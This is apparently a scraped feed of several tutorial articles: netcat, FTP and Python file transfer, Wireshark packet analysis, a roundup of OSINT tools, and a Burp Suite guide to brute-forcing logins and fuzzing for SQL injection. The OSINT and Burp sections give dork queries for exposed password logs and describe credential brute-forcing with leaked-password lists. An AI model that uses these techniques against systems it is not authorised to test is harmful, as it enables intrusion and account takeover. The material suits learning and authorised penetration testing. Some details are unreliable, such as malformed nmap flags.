Netcat is a Linux utility used for raw tcp/ip communication, transferring files, port scanning, and network troubleshooting, etc. It comes pre-installed in many Linux-based systems, and it is mainly used by Network Administrators.

If not already installed, you can install Netcat by typing the following command

$ sudo apt-get install netcat

To transfer files using Netcat, you have to type these commands. Turn the Netcat server on listening mode on any port, e.g.(port 4747), and type the path of the file you want to send.

$ nc -l -p 4747 < path/of/file.ext

On the receiving host, run the following command.

$ nc sending-server.url.com 4747 > path/of/file.ext

Note: The server sending file will use less than sign in the command ‘<’ while the receiving computer will have ‘>’ in the netcat command.

You can also transfer directories. Set the receiving host to listen on a port, e.g. (4747).

$ nc -l -p 4747 | tar -zxfv  /path/of/directory

Send it to the receiving host listing on the port.

$ tar czvf - /path/of/directory | nc receiving-hast.url.com 4747

The directory will be transferred. To close the connection, press CTRL+C

Transfer Files Using FTP

FTP (file transfer protocol) is used to transfer files between computers or clients and servers. It is faster than HTTP and other protocols in terms of file transfer because it is specifically designed for this purpose. It allows you to transfer multiple files and directories, and if there is any interruption in the connection during the transfer, the file will not be lost. Instead, it will resume transferring where it got dropped.

You can install an FTP server like vsftpd using apt by running this command.

$ sudo apt install -y vsftpd

After the package has been installed, you have to start the service by typing.

$ sudo systemctl start vsftpd
$ sudo systemctl enable vsftpd

Then you can connect to the FTP server by typing the command FTP and the IP address.

$ ftp [IP_Address]

It will ask you the username and password of the FTP server. After you have entered the username and password, you will be connected to your FTP server.

You can list out all the contents of the server by executing this command.

ftp> ls

Download via FTP

If you want to download any file from the FTP server, then you can get it by typing the command.

ftp> get  path/of/file

The file will be downloaded. You can also use different wildcards to download multiple files in a directory. For example ;

ftp> mget  *.html

It will download all the files with the extension “.html” .

You can also set up a local directory for downloaded files from the FTP server by using the lcd command.

ftp> lcd  /home/user/directory-name

Upload files via FTP

To upload files on the FTP server, type the following command.

ftp> put  path/of/local/file

The file will be uploaded to the FTP server. To upload multiple files, type commands.

ftp> mput  *.html

It will upload all the files with the extension “.html” .

Downloading  files using Python

Python has a module called ‘http.server’, which is used to transfer files, but with it, you can only download files.

If you don’t have the python installed, then type the following command.

$ sudo apt install -y python3

To turn on the python server, use the command.

$ sudo  python3  -m  http.server  4747 #[port e.g.(4747)]

Now the python server is listening on port 4747.

Go to your web browser and type the IP address and port no. on which the python server is listening.

http://IP_Address:4747/

A page will open containing all the files and directory on the python server. You can go into any directory and download the files.

You can go into any directory and download any file.

Conclusion

SCP, Netcat, FTP, and Python are commonly used methods to transfer files. All of the above methods of transferring files and directories are fast, reliable, and used in modern days. There are a lot of other techniques as well; you can adopt any method you prefer.

]]>
WireShark in-depth Tutorial https://linuxhint.com/wireshark-in-depth-tutorial/ Tue, 24 Nov 2020 17:16:56 +0000 https://linuxhint.com/?p=78142 Wireshark is an open-source and free network traffic inspection tool. It captures and displays packets in real-time for offline analysis in a human-readable format with microscopic details. It requires some sound knowledge of basic networking and is considered an essential tool for system administrators and network security experts.

Wireshark is the de-facto go-to tool for several network problems that vary from network troubleshooting, security issue examination, inspecting network traffic of a suspicious application, debugging protocol implementations, along with network protocol learning purposes, etc.

The Wireshark project was initiated in 1998. Thanks to the global networking expert’s voluntary contribution, it continues to make updates for new technologies and encryption standards. Hence, it’s by far one of the best packet analyzer tools and is utilized as a standard commercial tool by various government agencies, educational institutes, and non-profit organizations.

The Wireshark tool is composed of a rich set of features. Some of them are the following:

  • Multiplatform: it is available for Unix, Mac, and Window systems.
  • It captures packets from various network media, i.e., Wireless LAN, Ethernet, USB, Bluetooth, etc.
  • It opens packet files captured by other programs such as Oracle snoop and atmsnoop, Nmap, tcpdump, Microsoft Network Monitor, SNORT, and many others.
  • It saves and exports captured packet data in various formats (CSV, XML, plaintext, etc.).
  • It provides description support for protocols including SSL, WPA/WPA2, IPsec, and many others.
  • It includes capture and display filters.

However, Wireshark won’t warn you of any malicious activity. It will only help you inspect and identify what is happening on your network. Moreover, it will only analyze network protocol/activities and won’t perform any other activity like sending/intercepting packets.

This article provides an in-depth tutorial that begins with the basics (i.e., filtering, Wireshark network layers, etc.) and takes you into the depth of traffic analysis.

Wireshark Filters

Wireshark comes with powerful filter engines, Capture Filters and Display Filters, to remove noise from the network or already captured traffic. These filters narrow down the unrequired traffic and display only the packets that you want to see. This feature helps network administrators to troubleshoot the problems at hand.

Before going into the details of filters. In case you are wondering how to capture the network traffic without any filter, you can either press Ctrl+E or go to the Capture option on the Wireshark interface and click Start.

Now, let’s dig deep into the available filters.

Capture Filter

Wireshark provides support in reducing the size of a raw packet capture by allowing you to use a Capture Filter. But it only captures the packet traffic that matches the filter and disregards the rest of it. This feature helps you monitor and analyze the traffic of a specific application using the network.

Do not confuse this filter with display filters. It’s not a display filter. This filter appears at the main window that is needed to set before starting packet capture. Moreover, you cannot modify this filter during the capture.

You can go to the Capture option of the interface and select Capture Filters.

You will be prompted with a window, as shown in the snapshot. You can choose any filter from the list of filters or add/create a new filter by clicking on the + button.

Examples of the list of helpful Capture Filters:

  • host ip_address – captures traffic, only between the specific communicating IP address
  • net 192.168.0.0/24 – captures traffic between IP address ranges/CIDRs
  • port 53 – captures DNS traffic
  • tcp portrange 2051-3502 – captures TCP traffic from port range 2051-3502
  • port not 22 and not 21 – capture all the traffic except SSH and FTP

Display Filter

Display filters allow you to hide some packets from the already captured network traffic. These filters can be added above the captured list and can be modified on the fly. You can now control and narrow down the packets you want to concentrate on while hiding the unnecessary packets.

You can add filters in the display filter toolbar right above the first pane containing packet information. This filter can be used to display packets based on protocol, source IP address, destination IP address, ports, value and information of fields, comparison between fields, and a lot more.

That’s right! You can build a combination of filters using logical operators like ==.!=,||,&&, etc.

Some examples of display filters of a single TCP protocol and a combination filter are shown below:

Network Layers in Wireshark

Other than packet inspection, Wireshark presents OSI layers that aids in the troubleshooting process. Wireshark shows the layers in reverse order, such as:

  1. Physical Layer
  2. Data Link Layer
  3. Network Layer
  4. Transport Layer
  5. Application Layer

Note that Wireshark does not always show the Physical layer. We will now dig in each layer to understand the important aspect of packet analysis, and what each layer presents in Wireshark.

Physical Layer

The Physical layer, as shown in the following snapshot, presents the physical summary of the frame, such as hardware information. As a network administrator, you do not generally extract information from this layer.

Data Link Layer

The next data link layer contains the source and destination network card address. It is relatively simple as it only delivers the frame from the laptop to the router or the next adjacent frame in the physical medium.

Network Layer

The network layer presents the source and destination IP addresses, IP version, header length, total packet length, and loads of other information.

Transport Layer

In this layer, Wireshark displays information about the transport layer, which consists of the SRC port, DST port, header length, and sequence number that changes for each packet.

Application Layer

In the final layer, you can see what type of data is being sent over the medium and which application is being used, such as FTP, HTTP, SSH, etc.

Traffic Analysis

ICMP Traffic Analysis

ICMP is used for error reporting and testing by determining if the data reaches the intended destination on time or not. Ping utility uses ICMP messages to test the speed of the connection between devices, and report how long the packet takes to reach its destination then come back.

The ping uses ICMP_echo_request message to the device on the network, and the device responds by ICMP_echo_reply message. To capture packets on the Wireshark, start the Capture function of the Wireshark, open the terminal, and run the following command:

ubuntu$ubuntu:~$ ping google.com

Use Ctrl+C to terminate the packet capture process in Wireshark. In the snapshot below, you can notice the ICMP packet sent = ICMP packet received with 0% packet loss.

In the Wireshark capture pane, select the first ICMP_echo_request packet and observe the details by opening the middle Wireshark pane.

In the Network Layer, you can notice the source Src as my ip_address, whereas the destination Dst ip_address is of Google server, whereas the IP layer mentions the protocol to be ICMP.

Now, we zoom into the ICMP packet details by expanding Internet Control Message Protocol and decode the highlighted boxes in the snapshot below:

  • Type: 08-bit field set to 8 means Echo request message
  • Code: always zero for ICMP packets
  • checksum: 0x46c8
  • Identifier Number (BE): 19797
  • Identifier Number (LE): 21837
  • Sequence Number (BE): 1
  • Sequence Number (LE): 256

The identifier and the sequence numbers are matched to aid in identifying the replies to echo requests. Similarly, before packet transmission, the checksum is computed and added to the field to be compared against the checksum in the received data packet.

Now, in the ICMP reply packet, notice the IPv4 layer. The source and destination addresses have swapped.

In the ICMP layer, verify and compare the following important fields:

  • Type: 08-bit field set to 0 means Echo reply message
  • Code: always 0 for ICMP packets
  • checksum: 0x46c8
  • Identifier Number (BE): 19797
  • Identifier Number (LE): 21837
  • Sequence Number (BE): 1
  • Sequence Number (LE): 256

You can notice that the ICMP reply echoes the same request checksum, identifier, and sequence number.

HTTP Traffic Analysis

HTTP is a Hypertext Transfer application layer protocol. It is used by the world wide web and defines rules when the HTTP client/server transmits/receives HTTP commands. The most commonly used HTTP methods ae POST and GET:

POST: this method is used to securely send confidential information to the server that doesn’t appear in the URL.

GET: this method is usually used to retrieve data from the address bar from a web server.

Before we dig deeper into HTTP packet analysis, we will first briefly demonstrate the TCP three-way-handshake in Wireshark.

TCP Three-Way-Handshake

In a three-way handshake, the client initiates a connection by sending an SYN packet and receiving an SYN-ACK response from the server, which is acknowledged by the client. We will use the Nmap TCP connect scan command to illustrate TCP handshake between client and server.

ubuntu$ubuntu:~$ nmap -sT google.com

In the Wireshark packet capture pane, scroll to the top of the window to notice various three-ways-handshakes established based on particular ports.

Use the tcp.port == 80 filter to see if the connection is established via port 80. You can notice the complete three-way-handshake, i.e., SYN, SYN-ACK, and ACK, highlighted at the top of the snapshot, illustrating a reliable connection.

HTTP Packet Analysis

For HTTP packet analysis, go to your browser and paste the Wireshark documentation URL: http://www.wafflemaker.com and download the user’s guide PDF. In the meantime, Wireshark must be capturing all the packets.

Apply an HTTP filter and look for the HTTP GET request sent to the server by the client. To view an HTTP packet, select it, and expand the application layer in the middle pane. There can be a lot of headers in a request, depending upon the website and browser as well. We will analyze the headers present in our request in the snapshot below.

  • Request Method: the HTTP request method is GET
  • Host: identifies the name of the server
  • User-Agent: informs about the client-side browser type
  • Accept, Accept-Encoding, Accept-language: informs the server about the file type, accepted encoding at the client-side, i.e., gzip, etc., and the accepted language
  • Cache-Control: shows how the requested information is cached
  • Pragma: shows the cookie’s name and values the browser holds for the website
  • Connection: header that controls whether the connection stays open after the transaction

In the HTTP OK packet from server to client, observing the information in the Hypertext Transfer Protocol layer shows “200 OK“. This information indicates a normal successful transfer. In the HTTP OK packet, you can observe different headers in comparison to the HTTP GET packet. These headers contain information about the requested content.

  • Response Version: informs about the HTTP version
  • Status Code, Response Phrase: sent by the server
  • Date: the time when the server received the HTTP GET packet
  • Server: server details (Nginx, Apache, etc.)
  • Content-type: type of content (json, txt/html, etc.)
  • Content-length: total length of content; our file is 39696 bytes

In this section, you have learned how HTTP works and what happens whenever we request content on the web.

Conclusion

Wireshark is the most popular and powerful network sniffer and analysis tool. It is widely used in day-to-day packet analysis tasks in various organizations and institutes. In this article, we have studied some beginner to medium level topics of the Wireshark in Ubuntu. We have learned the type of filters offered by Wireshark for packet analysis. We have covered the network layer model in Wireshark and performed in-depth ICMP and HTTP packet analysis.

However, learning and understanding various aspects of this tool is a long hard journey. Hence, there are a lot of other online lectures and tutorials available to help you around specific topics of Wireshark. You can follow the official user guide available on the Wireshark website. Moreover, once you have built the basic understanding of protocol analysis, it’s also advised to use a tool like Varonis that points you at the potential threat and then use Wireshark to investigate for better understanding. ]]> OSINT Tools and Techniques https://linuxhint.com/osint-tools-and-techniques/ Tue, 24 Nov 2020 13:31:56 +0000 https://linuxhint.com/?p=78024 OSINT, or Open Source Intelligence, is the act of gathering data from distributed and freely accessible sources. OSINT tools are used to gather and correspond data from the Web. Data is accessible in different structures, including text design, documents, images, etc. The analysis and collection of information from the Internet or other publicly available sources is known as OSINT or Open Source Intelligence. This is a technique used by intelligence and security companies to gather information. This article provides a look at some of the most useful OSINT tools and techniques.

Maltego

Maltego was created by Paterva and is utilized by law enforcement, security experts, and social engineers for gathering and dissecting open-source information. It can gather large amounts of information from various sources and utilize different techniques to produce graphical, easy-to-see outcomes. Maltego provides a transformation library for the exploration of open-source data and represents that data in a graphical format that is suitable for relation analysis and data mining. These changes are inbuilt and can likewise be altered, dependent on necessity.

Maltego is written in Java and works with every operating system. It comes pre-installed in Kali Linux. Maltego is widely used because of its pleasant and easy-to-understand entity-relationship model that represents all the relevant details. The key purpose of this application is to investigate real-world relationships between people, web pages or domains of organizations, networks, and internet infrastructure. The application may also focus on the connection between social media accounts, open-source intelligence APIs, self-hosted Private Data, and Computer Networks Nodes. With integrations from different data partners, Maltego expands its data reach to an incredible extent.

Recon-ng

Recon-ng is a surveillance tool that is identical to Metasploit. If recon-ng is being operated from the command line, you will enter an environment, such as a shell, in which you can configure options and reconfigure and output reports for different report forms. A variety of helpful features are offered by the virtual console of Recon-ng, such as command completion and contextual support. If you want to hack something, use Metasploit. If you want to gather public information, use the Social Engineering Toolkit and Recon-ng to carry out surveillance.

Recon-ng is written in Python, and its independent modules, key list, and other modules are mainly used for data collection. This tool is preloaded with several modules that use online search engines, plugins, and APIs that can assist in collecting the target information. Recon-ng, like cutting and pasting, automates time-consuming OSINT processes. Recon-ng does not suggest that its tools can carry out all OSINT collection, but it can be used to automate many of the more common forms of harvesting, allowing more time for the stuff that still needs to be done manually.

Use the following command to install recon-ng:

ubuntu@ubuntu:~$    sudo apt install recon-ng
ubuntu@ubuntu:~$    recon-ng

To list the available commands, use the help command:

Suppose we need to gather some subdomains of a target. We will use a module named “hacker target” to do so.

[recon-ng][default] > load hackertarget
[recon-ng][default][hackertarget] > show options
[recon-ng][default][hackertarget] > set source google.com

Now, the program will gather related information and show all the subdomains of the target set.

Shodan

To find anything on the Internet, especially the Internet of Things (IoT), the optimum search engine is Shodan. While Google and other search engines index search only the Internet, Shodan indexes almost everything, including webcams, water supplies to private jets, medical equipment, traffic lights, power plants, license plate readers, smart TVs, air conditioners, and anything you may think of that is wired into the internet. The greatest benefit of Shodan lies in helping defenders to locate vulnerable machines on their own networks. Let us look at some examples:

  • To find Apache servers in Hawaii:
    apache city:”Hawaii”
  • To find Cisco devices on a given subnet:
    cisco net:”214.223.147.0/24”

You can find things like webcams, default passwords, routers, traffic lights, and more with simple searches, as it is simpler, clearer, and easier to use.

Google Dorks

Google hacking, or Google dorking, is a hacking tactic that utilizes Google Search and other Google apps to identify security flaws in a website’s configuration and machine code. “Google hacking” involves using specialized Google search engine operators to find unique text strings inside search results.
Let us explore some examples using Google Dork to locate private information on the Internet. There is a way of identifying .LOG files that are unintentionally exposed on the internet. A .LOG file contains clues on what system passwords could be or the different system user or admin accounts that could exist. Upon typing the following command in your Google search box, you will find a list of products with exposed .LOG files before the year 2017:

allintext:password filetype:log before:2017

The following search query will find all the web pages that contain the specified text:

intitle:admbook intitle:Fversion filetype:php

Some other very powerful search operators include the following:

  • inurl: Searches for specified terms in the URL.
  • filetypes: Searches for specific file types, which can be any file type.
  • site: Limits the search to a single site

Spyse

Spyse is a cybersecurity search engine that can be used to quickly find internet assets and conduct external identification. The advantage of Spyse is partly due to its database methodology, which avoids the issue of long scanning times on queries for data collection. With several services operating at the same time, and reports that can take a very long time to return, cybersecurity specialists may know how inefficient scanning may be. This is the main reason why cybersecurity professionals are shifting towards this awesome search engine. The Spyse archive holds over seven billion important data documents that can be downloaded instantly. Using 50 highly functioning servers with data split into 250 shards, consumers can profit from the biggest scalable online database available.

In addition to supplying raw data, this cyberspace search engine also focuses on demonstrating the relationship between various areas of the Internet.

The Harvester

The Harvester is a Python-based utility. Using this program, you can obtain information from numerous public outlets, such as search engines, PGP key servers, and SHODAN device databases, such as addresses, sub-domains, administrators, employee names, port numbers, and flags. If you want to determine what an intruder can see in the company, this instrument is useful. This is the default Kali Linux tool, and you just have to upgrade The Harvester to use it. For installation, issue the following command:

ubuntu@ubuntu:~$ sudo apt-get theharvester

The basic syntax of The Harvester is as follows:

ubuntu@ubuntu:~$ theharvester -d [domainName] -b [searchEngineName / all][parameters]

Here, -d is the company name or the domain you want to search, and -b is the data source, such as LinkedIn, Twitter, etc. To search emails, use the following command:

ubuntu@ubuntu:~$ theharvester.py -d Microsoft.com -b all

The ability to search for virtual hosts is another fascinating feature of harvester. Through DNS resolution, the application validates whether several hostnames are connected with a certain IP address. This knowledge is very important because the reliability of that IP for a single host relies not just on its level of security but also on how safely the others hosted on the same IP are wired. In fact, if an attacker breaches one of them and gets access to the network server, then the attacker can easily enter every other host.

SpiderFoot

SpiderFoot is a platform used for capturing IPs, domains, email addresses, and other analysis objectives from multiple data outlets, including platforms such as “Shodan” and “Have I Been Pwned,” for Open Source Information and vulnerability detection. SpiderFoot can be used to simplify the OSINT compilation process of finding information about the target by automating the gathering process.

To automate this process, Spiderfoot searches over 100 sources of publicly available information and manages all classified intel from the various sites, email addresses, IP addresses, networking devices, and other sources. Simply specify the goal, pick the modules to run, and Spiderfoot will do the rest for you. For example, Spiderfoot can gather all the data necessary to create a complete profile on a subject you are studying. It is multiplatform, has a cool web interface, and supports almost 100+ modules. Install the Python modules specified below to install spiderFoot:

ubuntu@ubuntu:~$    sudo apt install pip
ubuntu@ubuntu:~$    pip install lxml netaddr M2Crypto cherrypy mako requests bs4

Creepy

Creepy is an open-sourced intelligence platform for Geolocation. Using various social networking sites and image hosting services, Creepy gathers information about location tracking. Creepy then displays the reports on the map with a search methodology based on the precise location and time. You can later view the files in depth by exporting them in CSV or KML format. Creepy’s source code is available on Github and is written in Python. You can install this awesome tool by visiting the official website:
http://www.geocreepy.com/

There are two main functionalities of Creepy, specified by two specific tabs in the interface: the “mapview” tab and the “targets” tab. This tool is very useful for security personnel. You can easily predict the behavior, routine, hobbies, and interests of your target using Creepy. A small piece of information that you know may not be of much importance, but when you see the complete picture, you can predict the next move of the target.

Jigsaw

Jigsaw is used to obtain knowledge about workers in a company. This platform performs well with large organizations, such as Google, Yahoo, LinkedIn, MSN, Microsoft, etc., where we can easily pick up one of their domain names (say, microsoft.com), and then compile all the emails from their staff in the various divisions of the given company. The only downside is that these requests are launched against the Jigsaw database hosted at jigsaw.com, so we depend solely on the knowledge inside their database that they allow us to explore. You can obtain information about major corporations, but you might be out of luck if you are investigating a less-famous startup company.

Nmap

Nmap, which stands for Network Mapper, is unarguably one of the most prominent and popular social engineering tools. Nmap builds on previous network monitoring tools to provide quick, comprehensive scans of network traffic.

To install nmap, use the following command:

ubuntu@ubuntu:~$ sudo apt install nmap

Nmap is available for all the operating systems and comes pre-equipped with Kali. Nmap operates by detecting the hosts and IPs running on a network using IP packets and then examining these packets to include details on the host and IP, as well as the operating systems they are running.

Nmap is used to scan small business networks, enterprise-scale networks, IoT devices and traffic, and connected devices. This would be the first program an attacker would use to attack your website or web application. Nmap is a free and open-source tool used on local and remote hosts for vulnerability analysis and network discovery.

The main features of Nmap include port detection (to make sure you know the potential utilities running on the specific port), Operating System detection, IP info detection (includes Mac addresses and device types), disabling DNS resolution, and host detection. Nmap identifies the active host through a ping scan, i.e., by using the command nmap -sp 192.100.1.1/24, which returns a list of active hosts and assigned IP addresses. The scope and abilities of Nmap are extremely large and varied. The following include some of the commands that can be used for a basic port scan:

For a basic scan, use the following command:

ubuntu@ubuntu:~$    nmap

For banner grabbing and service version detection scans, use the following command:

ubuntu@ubuntu:~$    nmap -sP -sC

For Operating System detection and aggressive scans, use the following command:

ubuntu@ubuntu:~$    nmap -A -O-

Conclusion

Open Source Intelligence is a useful technique that you can use to find out almost anything on the Web. Having knowledge of OSINT tools is a good thing, as it can have great implications for your professional work. There are some great projects that are using OSINT, such as finding lost people on the Internet. Out of numerous Intelligence sub-categories, Open Source is the most widely used because of its low cost and extremely valuable output.

]]>
Using Burp for Automated Attacks https://linuxhint.com/using-burp-for-automated-attacks/ Mon, 09 Nov 2020 10:16:08 +0000 https://linuxhint.com/?p=76317

Burp Suite

Burp Suite is a rich-featured web application attack tool designed by Portswigger. It is equipped with everything needed to perform a successful pentest against a web application. Burp is the world’s most widely used web application tester & scanner, with over 40,000 active users, due to its easy to use interface and depth. It’s already an awesome web application pentesting with capabilities that can even further increased by adding extensions or add-ons called BApps.

Burp’s major features are as follows:

  • The ability to intercept HTTP requests that normally go from browser to the server, and then the server returns the response. This is done by its core feature called “Intercepting Proxy”. Here the request is interrupted midway and goes from the user’s browser to Burp, and then the server.
  • The ability to map the target, i.e., web application using the “Spider” tool. This is done to get the list of endpoints and crawl through them in order to find some vulnerabilities in them.
  • An advanced scanning web application tool for automating tasks of detecting vulnerabilities in the target (available only in PRO version).
  • An “Intruder” tool is used for automated attacks like brute-forcing a web application’s login page, dictionary attacks, fuzzing the web application to find vulnerabilities, etc.
  • A “Repeater” tool used for manipulating the user-supplied values or requests, and observing their behavior in order to find potentially vulnerable vectors.
  • A “Sequencer” tool for testing session tokens.
  • A “Decoder” tool for decoding and encoding numerous encoding schemes like base64, HEX, etc.
  • The ability to save the work and resume later (available only in PRO version).

Installation

Burp Suite can be downloaded from the official PortSwigger website:

https://portswigger.net/burp/communitydownload.

Burp is available to download for almost every operating system including Windows, Linux, and MacOS. By clicking on the Download Latest Version option, you will be redirected to a download page with different editions and operating systems, i.e., Community Edition or Professional Edition. Professional edition is paid with prices written on its official website. Download the Community edition, and you are ready to use its basic awesome features.

Usage

In order to use Burp, it needs to be configured to intercept HTTP requests. To configure browsers, i.e., Chrome, Firefox, etc., we have to follow the steps given below:

For configuring Chrome to work with Burp

In order to configure Chrome to work with a Burp, first, click on the Customize option on the top right corner of the window, then go to the Settings option. In the settings window, choose Advanced Settings, and then click on Change Proxy Settings from the given options.

For configuring Firefox to work with Burp

In order to configure Firefox to work with a Burp, go to the Firefox menu on the top right corner of the window, click on the Preferences option, then go to the Options button. Here, look for Network Proxy in the General tab. Click the Manual Proxy Config. Enter the listener address, i.e., 127.0.0.1, and Burp port, i.e., 8080. Delete everything in the “No Proxy for” field, and you are good to go.

Brute Force attack using Burp

Authentication is the process of making sure that the right person is accessing the service or the right person is logging in, using different techniques like access tokens, passwords, keys, etc. The use of passwords is highly common in everyday life. Here comes the importance of basic authentication, i.e., the choosing of a strong complex password, because the login area protected with weak authentication can be accessed easily using automated attacks like brute-forcing, dictionary attacks.

Dictionary Attack is a brute force attack on a login field with the help of a dictionary. In this attack, hundreds of thousands of possible combinations of guessed passwords stored in a dictionary are tried on the login field, with the intention that one of them may work. These passwords are tried successively on the login field in order to bypass the authentication.

Let’s consider a scenario where we have to brute force a login page using a dictionary or a word list containing hundreds of thousands or millions of commonly leaked passwords.

Open Burp Suite and start intercepting the traffic by turning Intercept On. Switch to the browser and enter any username or password in the given fields, then click Login. Now switch to Burp, you will see the traffic has been intercepted midway going to the server and goes to Burp instead. Right-click and choose, Send to Intruder from the given options.

Now, switch to Intruder tab, and we will see multiple tabs, i.e., Positions, Payloads, Options. We have to configure all the options in these tabs correctly to let the Burp do its work and get our desired outcome.

Positions

Let’s look at the Positions tab first. Here, we tell the burp the parameters we want to attack in the request, i.e., password field, username field, etc.

By default, Burp highlights some fields in order to recommend to the user what fields they can attack. But in our case, we just need to change the value of the username and password fields, so that they are changed with the next word in the dictionary, through which we are attacking in every request. For this, we need to first clear all the highlighted areas by clicking on the Clear button on the right side of the window. This will clear up Burp’s recommended highlighted areas. Now, highlight the username and password fields, which are “NOTEXIST” in our case, and then click Add. We also need to specify the Attack type, which is Sniper, by default and change it to Cluster Bomb.

Payloads

Now, we have to set our payload through which we are going to attack these selected fields. Their values will be changed with each request according to the payload. Let’s set up a payload for parameter 1, i.e., Username field. Let’s add a small word list of usernames we have in a file. Click on Payload 1, and choose Payload type as Simple List. In Payload Option, click Load and go to your desired word list file, then select it. The selected word list values will be shown as given below.

Now, in setting up a payload for parameter 2, i.e., the Password field, let’s add a commonly used word list of leaked passwords, i.e., “rockyou.txt” since in our case, we have this in a file. Click on Payload 2 and choose Payload type as Simple List. In Payload Option, click Load and go to your desired word list file, then select it. The selected word list values will be shown as given below.

Options

After setting up the attack parameters and payload list, it’s time to set up a very important option called “Options”. In the Options tab, some rules that are set to tell us which request is successful; in our case, it will tell which password did work. We have to configure a thing here, which is the string or message that will be displayed on getting the right password, i.e., Welcome, Welcome to our portal, Good to be back, etc. It depends on the web application developer. We can check it by entering any right credentials in the login area.

We have “Welcome to password protected area admin” here. Now, switch to Burp in the Options tab, find Grep Match, and write the following string here. Check the Simple String option, and we are good to go.

Everything is set up nicely. Now, all we have to do is to start the attack. Go to the Intruder tab, and then click Start Attack. An intruder will now try all combinations possible from the provided payloads.

We can see Intruder trying all combinations like the image given above. We can see if the request is successful or not by looking at the length of the requests. The successful request would be of a different length than the non-successful one. Another way of knowing whether the request is successful or not is by looking at the “Welcome to password protected area” (i.e., the string we have provided to the Options tab earlier) tab. If the small box is ticked, it means the request is successful and vice versa. In our case, the successful request has length 4963, while it is 4902 in the case of an unsuccessful one.

Brute force attack using Burp, with the help of a powerful dictionary, is a very effective and underrated method of bypassing login pages, which are not made for malicious entities. In case of a weak password, a used, easy, or small password, this is a very effective technique.

Fuzzing

Fuzzing is an approach that is used for automating the process of discovering bugs, weaknesses, or vulnerabilities by sending a ton of requests to an application with various payloads, with the expectation that the web application might trigger an activity. It isn’t explicit to Web Applications, but can also be used in other numerous attacks like buffer, overflow, etc. A vast majority of common web vulnerabilities can be found through fuzzing like XSS cross-site scripting, SQL Injection, LFI, RFI, etc. Burp is -really powerful and it is also the best tool available – in getting the job done smoothly.

Fuzzing with Burp

Let’s take a web application vulnerable to SQL Injection and fuzz it with burp to find potentially vulnerable fields.

Fire up Burp and start intercepting the login request. We will see a bunch of data, right-click and click on the Send to Intruder options from the given menu. Go to the Positions tab and configure the right parameters. By default, Burp highlights some fields in order to recommend to the user what fields the user can attack. But in our case, we just need to change the value of username and password fields. First, clear all the highlighted areas by clicking on the Clear button on the right side of the window. This will clear Burp recommended highlighted areas. Now, just highlight the username and password fields, and then click Add. We also need to specify the Attack type and change it to Sniper.

Now, go to the Payloads tab and, here, we have to set our payload through which we are going to attack these selected fields. Their values will be changed with each request according to the payload. Let’s set up a payload for parameter 1 and parameter 2, i.e., Username and Password fields, respectively. Burp also has a wide range of its payloads for different types of vulnerabilities. We can use them or create or load one of our own in Burp’s easy to use interface. In this case, we are going to load Burp’s payload that will trigger an alert in case of finding a SQL vulnerability.

Select Simple List in Payload type option. Now, click on the Load option from the “Payload Options” window. Here, select Fuzzing-SQL injection payload from available options. Payload sets are used to figure out the list you are about to use for a specified parameter. In the event where you pick two attack vectors (parameters), there you can set an alternate word list for everyone. Likewise, you can set the payload type like case alteration, numbers, dates, and so on. For this situation, the basic list is vital since we are using Burp’s default payload.

Now, go to the Options tab, and you can see some very interesting options. For example, the “Grep” option that can be selected to match the response to the given keywords like “SQL”. Another cool option is the “Time out” option that comes in very handy in case of potential web application firewalls. In our case, we checked the “Follow redirection” option since we have a redirect parameter in the request. However, once in a while, the error can trigger additionally before the redirection, both then can be tested separately.

Now, everything is set up nicely, and the Burp intruder is ready to start the attack. Click on the Start attack option on the left corner and just wait for the attack, which would literally take hours manually to be completed, in just a minute or two. Once the attack is completed, all we have to do is to analyze the given results closely. We should look for a different or odd value in the length column. One should look for any anomalies in the status code too, as it also tells which request caused an error and vice versa.

On getting an odd status code or length value, one has to check the response window. In our case, we can see that the 4th request has a different status code and a higher length value than usual, and upon looking at the response area, we can see that Burp can bypass the login area using a value from the payload. The attack can be considered as successful.

This is a very effective technique in bug bounty and pen testing procedures as it investigates every parameter present in the site and attempts to comprehend what it does, if it is connected with Database or being reflected in the response page, among others. This technique, however, causes a lot of noise at the server’s side and can even lead to Denial of Service, which is frustrating to attackers as well as for web application users and developers.

Burp Extensions

With the help of Burp Extender, numerous useful Burp extensions can be added to enhance the capabilities of Burp. One can write its third-party code or load extensions. For loading and installing extensions to Burp, BApp Store is the place to go. There are various uses for Burp extensions, such as modifying HTTP requests and response, customizing the user interface, adding scanner and runtime checks, etc.

BApp Store

The BApp Store consists of Burp extensions that have been composed by clients of Burp Suite to enhance Burp’s abilities and features. You can see the rundown of accessible BApps introduced explicit BApps, and submitted client ratings for those you have introduced.

Burp extensions can also be downloaded from the BApp store’s website and can be added to Burp later on. Different BApps or BApp extensions are written in different languages like Python or Ruby and expect the user to download Jython or JRuby for them to work properly. Then configure Burp with the directory of the important language interpreters. In some cases, a BApp may require a later form of Burp or an alternate version of Burp. Let’s look at some of Burp’s enormous amount of useful extensions:

Autorize:

Autorize is a very effective extension when there is a need of detecting authorization vulnerabilities in a web application automatically. Detecting authorization vulnerabilities is a very time-consuming task for any bug bounty hunter or pentester. In the manual method, you need to remove cookies every time from each request to check whether authorization has been implemented or not. Autorize does this job automatically just by taking cookies of a low privileged user of a web application, then letting the more privileged user navigate it. Autorize does this by repeating each request with a low privileged user session and starts detecting authorization vulnerabilities or flaws.

It is likewise conceivable to repeat each request with no provided cookies, to recognize authentication flaws as well as authorization vulnerabilities. This extension works without any prior configuration, but at the same time is profoundly adaptable, permitting arrangement of the granularity of the approval authorization conditions and requesting the extension a must test and whatnot.

On completing the procedure, there will be Red, Green, and Yellow colors on the screen, showing “Bypassed”, “Enforced”, and “ Is Enforced ?? ” statuses respectively.

Turbo Intruder

Turbo Intruder is a modified version of Burp Intruder and is used when there is a need for extreme complexity and speed for handling HTTP requests. Turbo Intruder is Fast as it uses an HTTP stack handed code from the base, prioritizing and keeping speed in mind. This makes it extremely fast, and sometimes, even a better option than well written GO scripts. Its scalable nature is another highlight, which is due to its ability to achieve flat memory usage. Turbo Intruder can also run in a command-line environment. An advanced diffing algorithm is built in this awesome extension, which automatically filters out boring and useless output.

One of the main attacks in which Turbo Intruder can be used is Race Condition Attacks. When a system that has been designed to perform tasks in a specific sequence is forced to perform more than one task at a time, it is called a race condition. In that kind of scenario, Turbo Intruder is used, as it can perform multiple tasks with enormous speed. This type of attack can be used in the existence of race condition vulnerability and can cause attacks like redeeming multiple gift cards, abusing of like/unlike features, etc.

For sending the HTTP request to Turbo intruder, intercept the request and then right-click on the window, then select the Send to Turbo Intruder option from the given list of options. Turbo Intruder is a bit harder to use than Burp’s default Intruder.

Conclusion:

